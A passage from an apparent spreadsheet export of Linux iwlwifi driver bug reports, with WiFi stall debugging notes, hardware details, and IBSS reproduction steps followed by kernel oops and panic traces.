on the router. The tcpdump on the router is of course also showing the answer packets, but those are not visible for the tcpdump on the client any longer.) --&gt; Wlan upstream communication is fine and only the downlink fail, at least when the wlan was primarly beeing used to downlad data to trigger the bug. The wifi connection can be "fixed" by disconnecting and reconnecting to the wlan, I'm doing that via the KDE connection manager. I had the same problem with older kernels and first suspected the wlan router running openwrt and only recently started to investigate the iwlwifi driver, since the other WLAN clients are not showing the same problem. (But there is only one android device there which has compareable usage.) As plattform I'm currently running gentoo unstable with kernel 3.18.5-gentoo and iwl6000-ucode version 9.221.4.1 (md5: feea228ed059c3a998c12031313242b8). Test setup: 0) wifi connection to a openwrt router with EAP-TLS (WPA-PSK not tested) 1) mounting a webdav share from owncloud via davfs2 2) opening ssh connection to the Openwrt router and running date in a loop, once each second 3) taring a directory with &gt;100G of data from the webdav share 4) capturing 802.11 traffic on a seperate system with tcpdump with the card in monitor mode and set to the correct channel (restarting tcpdump from time to time when the capture is getting too big) 5) running "trace-cmd record -e iwlwifi -e iwlwifi_msg -e mac80211 -e cfg80211" (not attached, but I have trace file with the failure in it, ~590MB compressed.) 6) Waiting for the date output on the openwrt router to freeze (may take ~1h) 7) Stopping the long running iwlwifi trace and running a new trace with during the error (1436_trace.dat.gz) The attached files are for the wifi drop around 14:36:01 CET (13:36:01 CET) Speculation: For the last two attemps (the first seriously debugged ones) there is always a notification about a WPA key handshake in the Router log. Also in this event the connection recovered after some time (but taking &gt;&gt;10min) without manually reconnecting while still working on this ticket. Since I never waited more than 10min previously I now assume that the problem may be caused via a WPA rekey and and fixed by a later one?. I noticed that the connection was back around 15:49 CET and suspect the WPA EAP handshake at 15:30:19 CET in the openwrt log to have fixed the issue (which started for sure at 14:36 CET) Attached files: 1436_trace.dat.gz iwlwifi trace during the error 1436_openwrt.log log extract from openwrt router 1436_client.log log extract from iwlwifi client 1436_wifi-capture.pcap.gz wifi capture from another system, 150Byte snaplen only (full packet lenght version availible if needded) Some more details about the client system: lspci -v -s 03:00.0 03:00.0 Network controller: Intel Corporation Centrino Ultimate-N 6300 (rev 3e) Subsystem: Intel Corporation Centrino Ultimate-N 6300 3x3 AGN Flags: bus master, fast devsel, latency 0, IRQ 32 Memory at f3000000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [e0] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number 24-77-03-ff-ff-d2-5e-a8 Kernel driver in use: iwlwifi Kernel modules: iwlwifi iwlwifi kernel settings: CONFIG_IWLWIFI=m CONFIG_IWLWIFI_LEDS=y CONFIG_IWLWIFI_OPMODE_MODULAR=y # CONFIG_IWLWIFI_BCAST_FILTERING is not set # CONFIG_IWLWIFI_UAPSD is not set CONFIG_IWLWIFI_DEBUG=y CONFIG_IWLWIFI_DEBUG_EXPERIMENTAL_UCODE=y CONFIG_IWLWIFI_DEVICE_TRACING=y iwlwifi boot messages: Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: can't disable ASPM; OS doesn't have ASPM control Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: irq 32 for MSI/MSI-X Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: Direct firmware load for iwlwifi-6000-exp.ucode failed with error -2 Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: Direct firmware load for iwlwifi-6000-6.ucode failed with error -2 Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: Direct firmware load for iwlwifi-6000-5.ucode failed with error -2 Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: loaded firmware version 9.221.4.1 build 25532 op_mode iwldvm Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: CONFIG_IWLWIFI_DEBUG enabled Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: CONFIG_IWLWIFI_DEBUGFS disabled Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: CONFIG_IWLWIFI_DEVICE_TRACING enabled Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: Detected Intel(R) Centrino(R) Ultimate-N 6300 AGN, REV=0x74 Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Disabled Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0 wlp3s0: renamed from wlan0 Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Disabled Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: Radio type=0x0-0x3-0x1 Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Disabled Feb 1 13:35:14 perry kernel: iwlwifi 0000:03:00.0: Radio type=0x0-0x3-0x1</t>
  </si>
  <si>
    <t>2016-08-17 17:49 UTC</t>
  </si>
  <si>
    <t>iwlmvm: 7260: intermittent connection (no data transferred) - MWG100230068</t>
  </si>
  <si>
    <t>2015-02-17 20:19 UTC</t>
  </si>
  <si>
    <t>Stefan Soeffing</t>
  </si>
  <si>
    <t>2015-04-28 10:59 UTC</t>
  </si>
  <si>
    <t>Dear all, my Intel 7260 wifi is causing me troubles since quite some time now. Symptoms have been different in the past, from low data rates (became better when I installed a better antenna, though I'm no more than 4 meters away from the router) to frequent disconnects. With the current firmware/driver combination, disconnects are much less frequent (~ once a day) but data transmission is quite instable. On a regular basis (~ every 5-10 minutes), data transmission is interrupted: - WiFi is still connected - no data transmission - ping to router: packet loss, after some time I get the message ping: sendmsg: No buffer space available - sometimes the effect is less severe: ping times go up to ~10-20 secs, then back to normal (~5ms) - usually recovers by itself after ~60 secs Might be similar to Bug #93141 Things become better with iw wlan0 set power_save off =&gt; transfer stalls less frequently, maybe every 30 minutes Kernel 3.19 dmesg: Detected Intel(R) Dual Band Wireless AC 7260, REV=0x144 dmesg: loaded firmware version 23.13.10.0 op_mode iwlmvm See attached trace over a time period with normal transfer -&gt; stalled transfer -&gt; back to normal. Thanks a lot. Anything else I can provide?</t>
  </si>
  <si>
    <t>iwlmvm: 7260: IBSS causes panic - MWG100229852</t>
  </si>
  <si>
    <t>2015-02-18 16:35 UTC</t>
  </si>
  <si>
    <t>Richard Taylor</t>
  </si>
  <si>
    <t>2015-03-12 13:32 UTC</t>
  </si>
  <si>
    <t>Created attachment 167491 [details] dmesg Kernel panic when receiving an ICMP packet. I am happy to help conduct further tests to narrow this down. To reproduce: 1. Setup ibss net: ip link set dev wlp2s0 down iw wlp2s0 set type ibss ip link set dev wlp2s0 up iw wlp2s0 ibss join mynet 2412 ifconfig wlp2s0 10.2.1.201 netmask 255.255.255.0 --- log messages --- [ 149.106858] wlp2s0: Trigger new scan to find an IBSS to join [ 149.384256] wlp2s0: Selected IBSS BSSID 4a:25:92:b8:f3:9d based on configured SSID [ 149.387053] IPv6: ADDRCONF(NETDEV_CHANGE): wlp2s0: link becomes ready 2. ping known host on net: ping -c 1 10.2.1.11 # This works 3. leave net: iw wlp2s0 ibss leave 4. Rejoin net: ip link set dev wlp2s0 down iw wlp2s0 set type ibss ip link set dev wlp2s0 up iw wlp2s0 ibss join mynet 2412 ifconfig wlp2s0 10.2.1.201 netmask 255.255.255.0 5. This produced a traceback (but not a panic): [ 149.726300] ------------[ cut here ]------------ [ 149.727341] WARNING: CPU: 1 PID: 100 at drivers/net/wireless/iwlwifi/mvm/sta.c:273 iwl_mvm_add_sta+0x1b0/0x340 [iwlmvm]() [ 149.728136] Modules linked in: netconsole bridge stp llc arc4 iwlmvm bnep mac80211 intel_rapl iosf_mbi x86_pkg_temp_thermal[ 149.728314] ------------[ cut here ]------------ [ 149.728317] WARNING: CPU: 1 PID: 100 at net/core/netpoll.c:362 netpoll_send_skb_on_dev+0x25e/0x270() [ 149.728332] netpoll_send_skb_on_dev(): eno1 enabled interrupts in poll (e1000_xmit_frame+0x0/0xf70 [e1000e]) [ 149.728333] Modules linked in: netconsole bridge stp llc arc4 iwlmvm bnep mac80211 intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp kvm_intel kvm iwlwifi snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic iTCO_wdt iTCO_vendor_support dell_laptop snd_hda_intel dcdbas crct10dif_pclmul snd_hda_controller dell_wmi crc32_pclmul snd_hda_codec sparse_keymap cfg80211 crc32c_intel i8k snd_hwdep snd_seq ghash_clmulni_intel pcspkr serio_raw snd_seq_device btusb uvcvideo snd_pcm bluetooth videobuf2_vmalloc videobuf2_core videobuf2_memops v4l2_common videodev i2c_i801 joydev lpc_ich snd_timer media mfd_core usbtouchscreen mei_me snd i2c_hid mei sdhci_pci rfkill soundcore dw_dmac shpchp i2c_designware_platform dell_smo8800 i2c_designware_core dw_dmac_core nfsd auth_rpcgss nfs_acl lockd grace sunrpc nouveau i915 ttm i2c_algo_bit drm_kms_helper drm e1000e mxm_wmi sdhci_acpi ptp sdhci mmc_core pps_core wmi video r8152 mii [last unloaded: iptable_raw] [ 149.728355] CPU: 1 PID: 100 Comm: kworker/u8:3 Not tainted 3.19.0 #2 [ 149.728355] Hardware name: Dell Inc. Latitude 14 Rugged (5404)/07RKHG, BIOS A01 10/06/2014 [ 149.728365] Workqueue: phy0 ieee80211_iface_work [mac80211] [ 149.728365] 0000000000000000 000000001eb6534b ffff88021df9b308 ffffffff81763ee4 [ 149.728367] 0000000000000000 ffff88021df9b360 ffff88021df9b348 ffffffff8109adfa [ 149.728368] 0000000600000000 ffff8800c2abbc00 ffff8800ca391090 ffff880033c9f200 [ 149.728369] Call Trace: [ 149.728370] [&lt;ffffffff81763ee4&gt;] dump_stack+0x45/0x57 [ 149.728372] [&lt;ffffffff8109adfa&gt;] warn_slowpath_common+0x8a/0xc0 [ 149.728375] [&lt;ffffffff8109ae85&gt;] warn_slowpath_fmt+0x55/0x70 [ 149.728376] [&lt;ffffffff8139c49b&gt;] ? delay_tsc+0x3b/0x80 [ 149.728379] [&lt;ffffffffa00a79d0&gt;] ? e1000_clean_tx_ring+0x100/0x100 [e1000e] [ 149.728384] [&lt;ffffffff8166d10e&gt;] netpoll_send_skb_on_dev+0x25e/0x270 [ 149.728385] [&lt;ffffffff8166d3e2&gt;] netpoll_send_udp+0x2c2/0x410 [ 149.728387] [&lt;ffffffffa063f92f&gt;] write_msg+0xcf/0x140 [netconsole] [ 149.728388] [&lt;ffffffff810ed6ea&gt;] call_console_drivers.constprop.22+0xaa/0xf0 [ 149.728390] [&lt;ffffffff810eec2d&gt;] console_unlock+0x1dd/0x440 [ 149.728391] [&lt;ffffffff810e07be&gt;] ? down_trylock+0x2e/0x40 [ 149.728393] [&lt;ffffffff810ef240&gt;] vprintk_emit+0x3b0/0x550 [ 149.728394] [&lt;ffffffffa08a5ae0&gt;] ? iwl_mvm_add_sta+0x1b0/0x340 [iwlmvm] [ 149.728399] [&lt;ffffffff810ef569&gt;] vprintk_default+0x29/0x40 [ 149.728400] [&lt;ffffffff81762dc2&gt;] printk+0x55/0x6b [ 149.728401] [&lt;ffffffff8111d503&gt;] print_modules+0xa3/0xd0 [ 149.728403] [&lt;ffffffff8109adf5&gt;] warn_slowpath_common+0x85/0xc0 [ 149.728404] [&lt;ffffffff8109af2a&gt;] warn_slowpath_null+0x1a/0x20 [ 149.728406] [&lt;ffffffffa08a5ae0&gt;] iwl_mvm_add_sta+0x1b0/0x340 [iwlmvm] [ 149.728409] [&lt;ffffffffa08982ff&gt;] iwl_mvm_mac_sta_state+0x25f/0x420 [iwlmvm] [ 149.728412] [&lt;ffffffffa092ebfe&gt;] sta_info_insert_finish+0x15e/0x800 [mac80211] [ 149.728416] [&lt;ffffffffa0799987&gt;] ? __iwl_dbg+0xf7/0x130 [iwlwifi] [ 149.728420] [&lt;ffffffffa092f310&gt;] sta_info_insert_rcu+0x70/0xd0 [mac80211] [ 149.728424] [&lt;ffffffffa093ad65&gt;] ieee80211_ibss_finish_sta+0x115/0x2c0 [mac80211] [ 149.728429] [&lt;ffffffffa093afe8&gt;] ieee80211_ibss_add_sta+0xd8/0x170 [mac80211] [ 149.728434] [&lt;ffffffffa093c27a&gt;] ieee80211_rx_mgmt_probe_beacon+0x5fa/0x8d0 [mac80211] [ 149.728439] [&lt;ffffffffa0951690&gt;] ? __ieee80211_tx+0x2d0/0x3d0 [mac80211] [ 149.728446] [&lt;ffffffffa093cca0&gt;] ieee80211_ibss_rx_queued_mgmt+0x3c0/0x470 [mac80211] [ 149.728450] [&lt;ffffffff811f5aad&gt;] ? __slab_free+0xbd/0x300 [ 149.728452] [&lt;ffffffff811f5aad&gt;] ? __slab_free+0xbd/0x300 [ 149.728453] [&lt;ffffffff811f60be&gt;] ? kfree+0x14e/0x160 [ 149.728454] [&lt;ffffffffa093e9f8&gt;] ? ieee80211_iface_work+0x108/0x460 [mac80211] [ 149.728458] [&lt;ffffffff811f5eb6&gt;] ? kmem_cache_free+0x1c6/0x210 [ 149.728459] [&lt;ffffffffa093e9f8&gt;] ? ieee80211_iface_work+0x108/0x460 [mac80211] [ 149.728464] [&lt;ffffffffa093ec2b&gt;] ieee80211_iface_work+0x33b/0x460 [mac80211] [ 149.728468] [&lt;ffffffff811617e1&gt;] ? tracing_record_cmdline+0x21/0x120 [ 149.728470] [&lt;ffffffff810b357b&gt;] process_one_work+0x14b/0x3f0 [ 149.728472] [&lt;ffffffff810b3f43&gt;] worker_thread+0x53/0x470 [ 149.728474] [&lt;ffffffff810b3ef0&gt;] ? rescuer_thread+0x300/0x300 [ 149.728475] [&lt;ffffffff810b8e08&gt;] kthread+0xd8/0xf0 [ 149.728477] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 149.728478] [&lt;ffffffff8176a5bc&gt;] ret_from_fork+0x7c/0xb0 [ 149.728479] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 149.728481] ---[ end trace db9b5455a6d7770c ]--- 6. ping known host (may take a few pings and sometimes requires a incoming ping to trigger panic): [ 149.775009] coretemp kvm_intel kvm iwlwifi snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic iTCO_wdt iTCO_vendor_support dell_laptop snd_hda_intel dcdbas crct10dif_pclmul snd_hda_controller dell_wmi crc32_pclmul snd_hda_codec sparse_keymap cfg80211 crc32c_intel i8k snd_hwdep snd_seq ghash_clmulni_intel pcspkr serio_raw snd_seq_device btusb uvcvideo snd_pcm bluetooth videobuf2_vmalloc videobuf2_core videobuf2_memops v4l2_common videodev i2c_i801 joydev lpc_ich snd_timer media mfd_core usbtouchscreen mei_me snd i2c_hid mei sdhci_pci rfkill soundcore dw_dmac shpchp i2c_designware_platform dell_smo8800 i2c_designware_core dw_dmac_core nfsd auth_rpcgss nfs_acl lockd grace sunrpc nouveau i915 ttm i2c_algo_bit drm_kms_helper drm e1000e mxm_wmi sdhci_acpi ptp sdhci mmc_core pps_core wmi video r8152 mii [last unloaded: iptable_raw] [ 149.779028] CPU: 1 PID: 100 Comm: kworker/u8:3 Tainted: G W 3.19.0 #2 [ 149.779682] Hardware name: Dell Inc. Latitude 14 Rugged (5404)/07RKHG, BIOS A01 10/06/2014 [ 149.780329] Workqueue: phy0 ieee80211_iface_work [mac80211] [ 149.780948] 0000000000000000 000000001eb6534b ffff88021df9b678 ffffffff81763ee4 [ 149.781573] 0000000000000000 0000000000000000 ffff88021df9b6b8 ffffffff8109adfa [ 149.782219] 0000000000000000 ffff8802217ec680 0000000000000010 0000000000000001 [ 149.782860] Call Trace: [ 149.783483] [&lt;ffffffff81763ee4&gt;] dump_stack+0x45/0x57 [ 149.784118] [&lt;ffffffff8109adfa&gt;] warn_slowpath_common+0x8a/0xc0 [ 149.784738] [&lt;ffffffff8109af2a&gt;] warn_slowpath_null+0x1a/0x20 [ 149.785430] [&lt;ffffffffa08a5ae0&gt;] iwl_mvm_add_sta+0x1b0/0x340 [iwlmvm] [ 149.786065] [&lt;ffffffffa08982ff&gt;] iwl_mvm_mac_sta_state+0x25f/0x420 [iwlmvm] [ 149.786709] [&lt;ffffffffa092ebfe&gt;] sta_info_insert_finish+0x15e/0x800 [mac80211] [ 149.787400] [&lt;ffffffffa0799987&gt;] ? __iwl_dbg+0xf7/0x130 [iwlwifi] [ 149.788045] [&lt;ffffffffa092f310&gt;] sta_info_insert_rcu+0x70/0xd0 [mac80211] [ 149.788693] [&lt;ffffffffa093ad65&gt;] ieee80211_ibss_finish_sta+0x115/0x2c0 [mac80211] [ 149.789391] [&lt;ffffffffa093afe8&gt;] ieee80211_ibss_add_sta+0xd8/0x170 [mac80211] [ 149.790041] [&lt;ffffffffa093c27a&gt;] ieee80211_rx_mgmt_probe_beacon+0x5fa/0x8d0 [mac80211] [ 149.790694] [&lt;ffffffffa0951690&gt;] ? __ieee80211_tx+0x2d0/0x3d0 [mac80211] [ 149.791361] [&lt;ffffffffa093cca0&gt;] ieee80211_ibss_rx_queued_mgmt+0x3c0/0x470 [mac80211] [ 149.792012] [&lt;ffffffff811f5aad&gt;] ? __slab_free+0xbd/0x300 [ 149.792685] [&lt;ffffffff811f5aad&gt;] ? __slab_free+0xbd/0x300 [ 149.793341] [&lt;ffffffff811f60be&gt;] ? kfree+0x14e/0x160 [ 149.793989] [&lt;ffffffffa093e9f8&gt;] ? ieee80211_iface_work+0x108/0x460 [mac80211] [ 149.794647] [&lt;ffffffff811f5eb6&gt;] ? kmem_cache_free+0x1c6/0x210 [ 149.795315] [&lt;ffffffffa093e9f8&gt;] ? ieee80211_iface_work+0x108/0x460 [mac80211] [ 149.795967] [&lt;ffffffffa093ec2b&gt;] ieee80211_iface_work+0x33b/0x460 [mac80211] [ 149.796611] [&lt;ffffffff811617e1&gt;] ? tracing_record_cmdline+0x21/0x120 [ 149.797290] [&lt;ffffffff810b357b&gt;] process_one_work+0x14b/0x3f0 [ 149.797939] [&lt;ffffffff810b3f43&gt;] worker_thread+0x53/0x470 [ 149.798571] [&lt;ffffffff810b3ef0&gt;] ? rescuer_thread+0x300/0x300 [ 149.799260] [&lt;ffffffff810b8e08&gt;] kthread+0xd8/0xf0 [ 149.799908] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 149.800538] [&lt;ffffffff8176a5bc&gt;] ret_from_fork+0x7c/0xb0 [ 149.801194] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 149.801866] ---[ end trace db9b5455a6d7770d ]--- [ 149.802522] wlp2s0: failed to move IBSS STA 00:26:c6:49:15:1e to state 1 (-28) - keeping it anyway [ 303.228612] wlp2s0: failed to move IBSS STA 28:b2:bd:82:5c:99 to state 1 (-28) - keeping it anyway [ 320.924196] iwlwifi 0000:02:00.0: L1 Disabled - LTR Enabled [ 320.925083] iwlwifi 0000:02:00.0: L1 Disabled - LTR Enabled [ 320.938578] IPv6: ADDRCONF(NETDEV_UP): wlp2s0: link is not ready [ 323.218639] wlp2s0: Trigger new scan to find an IBSS to join [ 323.497962] wlp2s0: Selected IBSS BSSID 4a:25:92:b8:f3:9d based on configured SSID [ 323.502403] IPv6: ADDRCONF(NETDEV_CHANGE): wlp2s0: link becomes ready [ 323.702991] wlp2s0: failed to move IBSS STA 00:1e:65:48:5d:68 to state 1 (-28) - keeping it anyway [ 339.966162] wlp2s0: failed to move IBSS STA 28:b2:bd:82:5c:99 to state 1 (-28) - keeping it anyway [ 340.971343] BUG: unable to handle kernel NULL pointer dereference at (null) [ 340.972207] IP: [&lt;ffffffffa08ae073&gt;] rs_fill_lq_cmd+0x83/0x3e0 [iwlmvm] [ 340.973018] PGD 0 [ 340.973601] Oops: 0000 [#1] SMP [ 340.974173] Modules linked in: netconsole bridge stp llc arc4 iwlmvm bnep mac80211 intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp kvm_intel kvm iwlwifi snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic iTCO_wdt iTCO_vendor_support dell_laptop snd_hda_intel dcdbas crct10dif_pclmul snd_hda_controller dell_wmi crc32_pclmul snd_hda_codec sparse_keymap cfg80211 crc32c_intel i8k snd_hwdep snd_seq ghash_clmulni_intel pcspkr serio_raw snd_seq_device btusb uvcvideo snd_pcm bluetooth videobuf2_vmalloc videobuf2_core videobuf2_memops v4l2_common videodev i2c_i801 joydev lpc_ich snd_timer media mfd_core usbtouchscreen mei_me snd i2c_hid mei sdhci_pci rfkill soundcore dw_dmac shpchp i2c_designware_platform dell_smo8800 i2c_designware_core dw_dmac_core nfsd auth_rpcgss nfs_acl lockd grace sunrpc nouveau i915 ttm i2c_algo_bit drm_kms_helper drm e1000e mxm_wmi sdhci_acpi ptp sdhci mmc_core pps_core wmi video r8152 mii [last unloaded: iptable_raw] [ 340.978354] CPU: 1 PID: 703 Comm: irq/50-iwlwifi Tainted: G W 3.19.0 #2 [ 340.979060] Hardware name: Dell Inc. Latitude 14 Rugged (5404)/07RKHG, BIOS A01 10/06/2014 [ 340.979774] task: ffff88021c509bc0 ti: ffff8802249cc000 task.ti: ffff8802249cc000 [ 340.980494] RIP: 0010:[&lt;ffffffffa08ae073&gt;] [&lt;ffffffffa08ae073&gt;] rs_fill_lq_cmd+0x83/0x3e0 [iwlmvm] [ 340.981235] RSP: 0018:ffff8802249cf908 EFLAGS: 00010246 [ 340.981969] RAX: 0000000000000000 RBX: ffff8802217ee7b0 RCX: ffff8802217ee868 [ 340.982710] RDX: 0000000000000000 RSI: ffff8802217ee680 RDI: 0000000000000000 [ 340.983447] RBP: ffff8802249cf988 R08: 00000000000005dc R09: ffff880223b0b5f4 [ 340.984190] R10: 0000000000000000 R11: 00000000000005dc R12: ffff8802217ee680 [ 340.984923] R13: ffff8802237bdac8 R14: ffff8802217ee680 R15: ffff8802217ee868 [ 340.985653] FS: 0000000000000000(0000) GS:ffff88022ea80000(0000) knlGS:0000000000000000 [ 340.986385] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 340.987115] CR2: 0000000000000000 CR3: 0000000001c11000 CR4: 00000000001407e0 [ 340.987852] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 340.988589] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 340.989317] Stack: [ 340.990037] ffffffffa08cd24b ffff8802249cf918 ffff880200000030 ffff8802249cf9a0 [ 340.990766] ffff8802249cf938 00000000c7a977f4 0000000000000000 0000000100000001 [ 340.991485] 0000000000000000 00000000c7a977f4 0000000000000001 ffff8802237bdac8 [ 340.992206] Call Trace: [ 340.992918] [&lt;ffffffffa08aec65&gt;] iwl_mvm_rs_rate_init+0x5b5/0x7e0 [iwlmvm] [ 340.993649] [&lt;ffffffffa08af5b8&gt;] iwl_mvm_rs_tx_status+0x728/0x21e0 [iwlmvm] [ 340.994378] [&lt;ffffffffa07ab3ec&gt;] ? ftrace_raw_event_iwlwifi_dbg+0xec/0x1b0 [iwlwifi] [ 340.995106] [&lt;ffffffffa08b10c2&gt;] rs_mac80211_tx_status+0x52/0x80 [iwlmvm] [ 340.995830] [&lt;ffffffffa092ca44&gt;] ieee80211_tx_status+0x244/0xd90 [mac80211] [ 340.996545] [&lt;ffffffff81769f2a&gt;] ? _raw_spin_unlock_bh+0x1a/0x20 [ 340.997252] [&lt;ffffffffa07a23e1&gt;] ? iwl_trans_pcie_reclaim+0x211/0x3b0 [iwlwifi] [ 340.997953] [&lt;ffffffffa08a3795&gt;] iwl_mvm_rx_tx_cmd+0x405/0x7c0 [iwlmvm] [ 340.998657] [&lt;ffffffff81172b42&gt;] ? ftrace_event_buffer_commit+0xa2/0x1b0 [ 340.999364] [&lt;ffffffffa089d765&gt;] iwl_mvm_rx_dispatch+0x165/0x1b0 [iwlmvm] [ 341.000070] [&lt;ffffffffa079ec38&gt;] iwl_pcie_irq_handler+0xac8/0x1520 [iwlwifi] [ 341.000791] [&lt;ffffffff810d572b&gt;] ? pick_next_task_fair+0x1bb/0x8b0 [ 341.001518] [&lt;ffffffff810f1930&gt;] ? irq_finalize_oneshot.part.30+0xf0/0xf0 [ 341.002243] [&lt;ffffffff810f1950&gt;] irq_thread_fn+0x20/0x50 [ 341.002966] [&lt;ffffffff810f1c6f&gt;] irq_thread+0x13f/0x170 [ 341.003679] [&lt;ffffffff810f19f0&gt;] ? irq_forced_thread_fn+0x70/0x70 [ 341.004391] [&lt;ffffffff810f1b30&gt;] ? irq_thread_check_affinity+0x90/0x90 [ 341.005090] [&lt;ffffffff810b8e08&gt;] kthread+0xd8/0xf0 [ 341.005769] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 341.006449] [&lt;ffffffff8176a5bc&gt;] ret_from_fork+0x7c/0xb0 [ 341.007124] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 341.007804] Code: 08 c2 0f 85 20 03 00 00 48 8b 01 48 8b 96 a8 0f 00 00 c7 45 b0 00 00 00 00 48 89 45 b4 48 8b 41 08 48 89 45 bc 8b 41 10 89 45 c4 &lt;83&gt; 3a 02 49 8b 45 10 44 0f b6 b0 a0 03 00 00 0f b6 43 3a 0f 84 [ 341.009286] RIP [&lt;ffffffffa08ae073&gt;] rs_fill_lq_cmd+0x83/0x3e0 [iwlmvm] [ 341.009952] RSP &lt;ffff8802249cf908&gt; [ 341.010608] CR2: 0000000000000000 [ 341.011214] ---[ end trace db9b5455a6d7770e ]--- [ 341.011797] Kernel panic - not syncing: Fatal exception in interrupt [ 341.012399] Kernel Offset: 0x0 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffff9fffffff) [ 341.013047] drm_kms_helper: panic occurred, switching back to text console [ 341.013706] ---[ end Kernel panic - not syncing: Fatal exception in interrupt [ 341.014353] ------------[ cut here ]------------ [ 341.014986] WARNING: CPU: 1 PID: 703 at arch/x86/kernel/smp.c:124 native_smp_send_reschedule+0x61/0x70() [ 341.015634] Modules linked in: netconsole bridge stp llc arc4 iwlmvm bnep mac80211 intel_rapl iosf_mbi x86_pkg_temp_thermal coretemp kvm_intel kvm iwlwifi snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic iTCO_wdt iTCO_vendor_support dell_laptop snd_hda_intel dcdbas crct10dif_pclmul snd_hda_controller dell_wmi crc32_pclmul snd_hda_codec sparse_keymap cfg80211 crc32c_intel i8k snd_hwdep snd_seq ghash_clmulni_intel pcspkr serio_raw snd_seq_device btusb uvcvideo snd_pcm bluetooth videobuf2_vmalloc videobuf2_core videobuf2_memops v4l2_common videodev i2c_i801 joydev lpc_ich snd_timer media mfd_core usbtouchscreen mei_me snd i2c_hid mei sdhci_pci rfkill soundcore dw_dmac shpchp i2c_designware_platform dell_smo8800 i2c_designware_core dw_dmac_core nfsd auth_rpcgss nfs_acl lockd grace sunrpc nouveau i915 ttm i2c_algo_bit drm_kms_helper drm e1000e mxm_wmi sdhci_acpi ptp sdhci mmc_core pps_core wmi video r8152 mii [last unloaded: iptable_raw] [ 341.020412] CPU: 1 PID: 703 Comm: irq/50-iwlwifi Tainted: G D W 3.19.0 #2 [ 341.021211] Hardware name: Dell Inc. Latitude 14 Rugged (5404)/07RKHG, BIOS A01 10/06/2014 [ 341.022023] 0000000000000000 00000000c7a977f4 ffff88022ea83d58 ffffffff81763ee4 [ 341.022854] 0000000000000000 0000000000000000 ffff88022ea83d98 ffffffff8109adfa [ 341.023675] ffff88021c509cd0 0000000000000000 ffff88022ea14540 0000000000000001 [ 341.024489] Call Trace: [ 341.025286] &lt;IRQ&gt; [&lt;ffffffff81763ee4&gt;] dump_stack+0x45/0x57 [ 341.026167] [&lt;ffffffff8109adfa&gt;] warn_slowpath_common+0x8a/0xc0 [ 341.026974] [&lt;ffffffff8109af2a&gt;] warn_slowpath_null+0x1a/0x20 [ 341.027771] [&lt;ffffffff81049e71&gt;] native_smp_send_reschedule+0x61/0x70 [ 341.028571] [&lt;ffffffff810d648d&gt;] trigger_load_balance+0x13d/0x1f0 [ 341.029369] [&lt;ffffffff810c4d49&gt;] scheduler_tick+0x99/0xe0 [ 341.030159] [&lt;ffffffff81100a81&gt;] update_process_times+0x51/0x60 [ 341.030949] [&lt;ffffffff811103c5&gt;] tick_sched_handle.isra.19+0x25/0x60 [ 341.031737] [&lt;ffffffff81110444&gt;] tick_sched_timer+0x44/0x80 [ 341.032517] [&lt;ffffffff81101753&gt;] __run_hrtimer+0x73/0x1d0 [ 341.033293] [&lt;ffffffff81110400&gt;] ? tick_sched_handle.isra.19+0x60/0x60 [ 341.034076] [&lt;ffffffff81101b67&gt;] hrtimer_interrupt+0x107/0x250 [ 341.034854] [&lt;ffffffff8104c93c&gt;] local_apic_timer_interrupt+0x3c/0x70 [ 341.035633] [&lt;ffffffff8176d4e1&gt;] smp_apic_timer_interrupt+0x41/0x60 [ 341.036407] [&lt;ffffffff8176b57d&gt;] apic_timer_interrupt+0x6d/0x80 [ 341.037177] &lt;EOI&gt; [&lt;ffffffff81762be0&gt;] ? panic+0x1c3/0x204 [ 341.037953] [&lt;ffffffff81762bd9&gt;] ? panic+0x1bc/0x204 [ 341.038730] [&lt;ffffffff810187d7&gt;] oops_end+0xd7/0xe0 [ 341.039504] [&lt;ffffffff8106326f&gt;] no_context+0x13f/0x3a0 [ 341.040278] [&lt;ffffffff8106354d&gt;] __bad_area_nosemaphore+0x7d/0x210 [ 341.041054] [&lt;ffffffff8101e7ea&gt;] ? native_sched_clock+0x2a/0x90 [ 341.041828] [&lt;ffffffff810636f3&gt;] bad_area_nosemaphore+0x13/0x20 [ 341.042600] [&lt;ffffffff810639fe&gt;] __do_page_fault+0xce/0x5b0 [ 341.043369] 